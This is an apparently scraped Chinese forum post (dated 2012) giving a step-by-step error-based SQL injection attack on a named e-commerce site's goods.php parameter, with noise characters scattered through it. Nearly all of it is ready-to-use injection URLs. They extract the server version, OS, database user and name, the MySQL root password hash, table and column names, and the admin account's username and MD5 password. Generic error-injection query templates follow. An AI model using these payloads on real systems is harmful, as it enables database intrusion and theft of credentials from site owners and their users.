判断版本号 3 n _1 ^* H/ z8 c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% ]& `0 L+ O( \( I$ H/ h8 Z4 H% V/ E$ z- w# c
判断系统
" _. S$ k# r; P) s) @% ?
& z& w0 \* H. t# W0 D* chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 S$ Q8 Y4 m K
# d' X6 ?) v, ?/ g" |" I0 u
/ H+ j9 I9 L/ {2 R' ~; p( E3 r; m7 H0 q% p% s/ ?
当前 user()* @) h f1 u; i, I* P& C3 n
# D* }1 p7 q' J2 Z4 v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 |% ?! Y2 K7 v/ F6 V& }
$ P4 v/ ]2 E6 t1 F' Z( U1 [ s7 A; D9 v3 ^2 B! |
* H4 E C+ F$ ~6 h& u当前 database()6 r8 l$ A2 G1 V( V0 Q$ H2 G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 ~. G6 W1 v# s1 [- y( {/ o; C" ^" |1 U H
6 a% g. g p9 z2 _
; P* g1 M2 b. ?8 i: h" _
) r% o( M: k+ Y9 iroot hash7 {. L. E- v$ W1 n; d+ J4 K+ w
: y0 Q! B2 [) `8 w6 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 I$ Q, X* D0 U& ]; p! ~$ j% K' _5 A; W8 m% Q& c5 x" `* Q
' ]: @: @2 m W9 L- ~* a% o7 _
0 {+ g9 ^8 Q4 P- U$ t当前 数据库表名* c- ^' I* o0 E* h
& A4 x. X P* {: X! H: u3 shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% q2 w) f8 `9 U4 o4 H' y# |, e0 e0 s5 t! g- n; P- x" F- q
! a& l- b. |& F! D3 G
+ r% x) C' q8 ^6 L4 x当前 数据库 user_name 字段
5 Z( r3 b& a) o
9 @3 J$ X2 R/ I6 K, zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# k8 p0 _0 J. b2 P* A
$ d, ]+ r: s3 O/ ^* ~1 w
当前 数据库 字段 password! X( U& u$ y( R% B+ _. I
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" @! g; B" m1 R3 C2 _; d, ]2 u) }# r8 w, I+ q
4 Y4 s4 ^2 R# K3 ~+ l* Z: i
8 _& K, ^' T- L/ t$ f z+ J获得 admin passwd(md5)
* V4 L8 x! a& Q! ~9 Q
7 \! ^0 S. E+ y( ^# ?2 ]9 d$ e
: J1 ]/ z1 J: e, T5 }0 W+ bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 a3 J O9 m, V$ V- n3 q, h; m* O) L6 G6 w% `
报错注射
4 e/ k' k5 ~9 K8 hSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 H# u6 p% c% x2 i- c9 y# Q! Q6 x# e( Z+ A$ P
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" n7 c; s, U( B3 J/ f
" T/ z9 P' o4 _4 Yand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对